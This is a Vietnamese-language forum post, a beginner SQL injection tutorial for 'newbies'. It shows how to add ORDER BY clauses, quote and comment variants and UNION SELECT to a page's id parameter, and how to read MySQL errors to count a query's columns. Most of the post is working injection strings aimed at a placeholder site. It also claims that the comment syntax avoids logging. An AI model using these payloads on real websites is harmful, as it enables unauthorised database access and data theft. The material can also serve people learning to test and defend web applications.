[Tut] SQL injection Lab 2 [Order by] - for Newbie

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 7, 2017.

 1. Mickey

  Mickey Hacking For Hacker Staff Member

  Tiếp tục Lab cho Newbie,
  Order by được sử dụng để làm gì :
  -Làm tiết kiệm thời gian attack.
  -Nó được sử dụng để tính số field ,column có trong CSDL SQL.

  Cú pháp: order by xx (với xx là số nguyên, để hiệu quả nên order by 100 đầu tiên để xác định ta đi đúng hướng)

  VD: Mã:
  http://ww.site.com/index.php?id=1 order by 100
  Lỗi nhận biết

  Error: Unknown column '100' in 'order clause'
  --------------
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
  site có hiện tượng khác lạ (dựa vào kinh nghiệm)
  Nhưng cũng có site lại phải thêm dấu nháy và dấu -- hoặc -- - hoặc -- a hoặc /* mới order by được
  -- : Hiểu đơn giản là tránh bị ghi log
  - : Biến đoạn đằng sau dấu - thành chú thích.
  Sau đây là các trường hợp thường dùng để Order by :
  TH cú pháp Ví dụ
  TH1: order by
  http://ww.site.com/index.php?id=1 order by 100

  ' order by http://ww.site.com/index.php?id=1 ' order by 100 TH3:
  TH2: 'order by http://ww.site.com/index.php?id=1 'order by 100
  TH4: Mã:
  chuyển sang union select http://ww.site.com/index.php?id=1 union select 1
  Ví Dụ:
  http://ww.site.com/index.php?id=1 order by 1-- không lỗi
  http://ww.site.com/index.php?id=1 order by 2-- không lỗi
  http://ww.site.com/index.php?id=1 order by 3-- không lỗi
  http://ww.site.com/index.php?id=1 order by 4-- lỗi
  vậy ta thấy site có 3 cột lỗi (vì order by 4 cột --> hiện lỗi)


  hết Lab 2
   

Share This Page